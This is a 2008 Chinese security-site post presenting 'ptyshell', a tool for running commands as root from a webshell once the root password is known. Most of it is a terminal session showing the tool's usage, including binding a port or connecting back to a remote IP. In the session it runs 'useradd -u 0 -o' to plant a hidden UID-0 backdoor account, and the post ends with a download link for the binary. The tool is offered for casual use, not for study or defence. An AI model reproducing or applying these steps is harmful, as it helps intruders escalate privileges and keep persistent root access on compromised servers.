黑基Web安全攻防班
安基网 首页 IT技术 网络管理 查看内容

一个知道root密码可以在webshell里面执行命令的程序

2008-12-17 10:36| 投稿: Linux

摘要:   作者:xi4oyu  [test@localhost tmp]$ ls -l  total 488  -rwxr-xr-x 1 root root 494816 Oct 4 07:08 ptysh...
  作者:xi4oyu  [test@localhost tmp]$ ls -l  total 488  -rwxr-xr-x 1 root root 494816 Oct 4 07:08 ptyshell-static  [test@localhost tmp]$ md5sum ptyshell-static  3ea2a909f736660097c0248d403bbe80 ptyshell-static  [test@localhost tmp]$ ./ptyshell-static  ptyshell v0.4  orignal written by wzt ,psexec feature added by xi4oyu  usage: ./ptyshell-static <port> | <remote ip> <port>  ./ptyshell-static -u username -p password -c command -pd port  使用方法:  [test@localhost tmp]$ ./ptyshell-static 4444  [test@localhost tmp]$ grep xxoxx /et c/passwd  [test@localhost tmp]$ ./ptyshell-static -u root -p test -c "useradd -u 0 -o xxoxx" -dp 4444  Beginning to send command!  [test@localhost tmp]$ grep xxoxx /et c/passwd  xxoxx:x:0:510::/home/xxoxx:/bi n/bash  [test@localhost tmp]$  执行第二个命令的时候需要等待几秒,以后的命令执行都不需要再执行./ptyshell-stat 4444了。直接执行第二个命令就行。注意命令用""包含起来,命令表太长了,哈哈,否则不能执行可别怪我。  这里webshell里面也可以执行的,一个道理,呵呵。纯属2B之作,大家随便玩玩。  感谢tr宝宝提供空间  http://www.pcsec.org/upload/2008/12/ptyshell-static.rar

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部